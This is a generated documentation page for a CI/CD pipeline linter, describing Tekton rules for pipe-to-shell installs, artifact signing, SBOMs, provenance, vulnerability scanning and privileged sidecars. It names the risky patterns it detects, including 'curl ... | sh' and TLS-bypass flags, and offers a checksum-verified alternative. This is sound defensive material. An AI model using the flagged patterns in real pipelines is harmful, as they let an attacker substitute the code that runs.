Recommendation. Replace curl ... | sh with a download-then-verify-then-execute pattern. Drop TLS-bypass flags (curl -k, git config http.sslverify false); install the missing CA into the step image instead. Both forms let an attacker controlling DNS / a transparent proxy substitute the script the step runs.
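A sketch of the download-then-verify-then-execute pattern; the URL is illustrative and the placeholder must be the publisher's pinned SHA-256 checksum:

```sh
curl -fsSLo install.sh https://example.com/install.sh
echo "<expected-sha256>  install.sh" | sha256sum -c -
sh ./install.sh
```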
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: TKN-008 in the Tekton provider.
TKN-009: Artifacts not signed (no cosign/sigstore step) MEDIUM
Evidences: SI-7 Software, Firmware, and Information Integrity, SR-4 Provenance.
How this is detected. Detection mirrors GHA-006 / BK-009 / CC-006: the shared signing-token catalog (cosign, sigstore, slsa-github-generator, slsa-framework, notation-sign) is searched across every string in the Task / Pipeline document. The rule only fires on artifact-producing Tasks (those that invoke docker build / docker push / buildah / kaniko / helm upgrade / aws s3 sync / etc.) so lint-only Tasks don't trip it.
Recommendation. Add a signing step to the Task, either a dedicated cosign sign step after the build, or use the official cosign Tekton catalog Task as a referenced step. The Task should sign by digest (cosign sign --yes <repo>@sha256:<digest>) so a re-pushed tag can't bypass the signature.
Source: TKN-009 in the Tekton provider.
TKN-010: No SBOM generated for build artifacts MEDIUM
Evidences: CM-8 System Component Inventory, SR-4 Provenance.
How this is detected. An SBOM (CycloneDX or SPDX) records every component baked into the build. Without one, post-incident triage can't answer 'did this CVE ship?' for a given artifact. Detection uses the shared SBOM-token catalog: syft, cyclonedx, cdxgen, spdx-tools, microsoft/sbom-tool. Fires only on artifact-producing Tasks.
Recommendation. Add an SBOM-generation step. syft <artifact> -o cyclonedx-json > $(workspaces.output.path)/sbom.json runs in the official syft Tekton catalog Task. cyclonedx-cli and cdxgen are alternatives. Publish the SBOM as a Workspace result so downstream Tasks can consume it.
Source: TKN-010 in the Tekton provider.
TKN-011: No SLSA provenance attestation produced MEDIUM
Evidences: CM-2 Baseline Configuration, SI-7 Software, Firmware, and Information Integrity, SR-4 Provenance.
How this is detected. Provenance generation is distinct from signing. A signed artifact proves who published it; a provenance attestation proves where / how it was built. Tekton Chains is the Tekton-native answer: once enabled on the cluster, every TaskRun's outputs are signed and attested without per-Task wiring. Detection uses the shared provenance-token catalog (slsa-framework, cosign attest, in-toto, attest-build-provenance, witness run). Tasks produced by tekton-chains pass on the cosign attest match.
Recommendation. After the build step, run cosign attest --predicate slsa.json --type slsaprovenance <ref> (or use the tekton-chains controller, which signs and attests every TaskRun automatically when configured). Publish the attestation alongside the artifact so consumers can verify how it was built, not just who signed it.
Source: TKN-011 in the Tekton provider.
TKN-012: No vulnerability scanning step MEDIUM
Evidences: RA-5 Vulnerability Monitoring and Scanning, SI-2 Flaw Remediation.
How this is detected. Vulnerability scanning sits at a different layer from signing and SBOM: it answers 'does this artifact ship a known CVE?' rather than 'can we verify what it is?'. Detection uses the shared vuln-scan-token catalog: trivy, grype, snyk, npm-audit, pip-audit, osv-scanner, govulncheck, anchore, codeql-action, semgrep, bandit, checkov, tfsec, dependency-check. Walks every Task / Pipeline / *Run document; passes if any document includes a scanner reference.
Recommendation. Add a vulnerability scanner step. trivy fs $(workspaces.src.path) for source / filesystem; trivy image <ref> for container images. The official Tekton catalog ships trivy-scanner and grype-scanner Tasks if you'd rather reference one. Fail the step on findings above a chosen severity so a regression blocks the merge instead of shipping.
Source: TKN-012 in the Tekton provider.
TKN-013: Tekton sidecar runs privileged or as root HIGH
Evidences: AC-6 Least Privilege, CM-7 Least Functionality.
How this is detected. TKN-002 hardens the spec.steps list. Tekton's spec.sidecars list runs alongside the steps in the same pod, but a sidecar's container image and command come from a separate place in the manifest, so a Task with hardened steps and a privileged sidecar (a common pattern when wrapping docker:dind) leaves the same kernel-namespace gap TKN-002 was meant to close. The detection mirrors TKN-002: fires on a sidecar with securityContext.privileged: true, runAsUser: 0, runAsNonRoot: false, allowPrivilegeEscalation: true, or no securityContext block at all.
Recommendation. Set securityContext.privileged: false, runAsNonRoot: true, and allowPrivilegeEscalation: false on every sidecar in spec.sidecars. A privileged sidecar is the same escape vector as a privileged step: it shares the pod's network and kernel namespaces, and a compromised sidecar image owns the entire TaskRun's execution surface.
Known false positives.
- Tasks that genuinely need docker:dind as a sidecar, e.g. building images inside the cluster without giving the step itself host-Docker access. The replacement pattern is Kaniko or BuildKit running as the step itself, with no privileged sidecar; if neither is viable, ignore TKN-013 in .pipeline-check-ignore.yml for the affected Task.
Source: TKN-013 in the Tekton provider.
This page is generated. Edit pipeline_check/core/standards/data/nist_800_53.py (mappings) or scripts/gen_standards_docs.py (intro / per-control prose) and run python scripts/gen_standards_docs.py nist_800_53.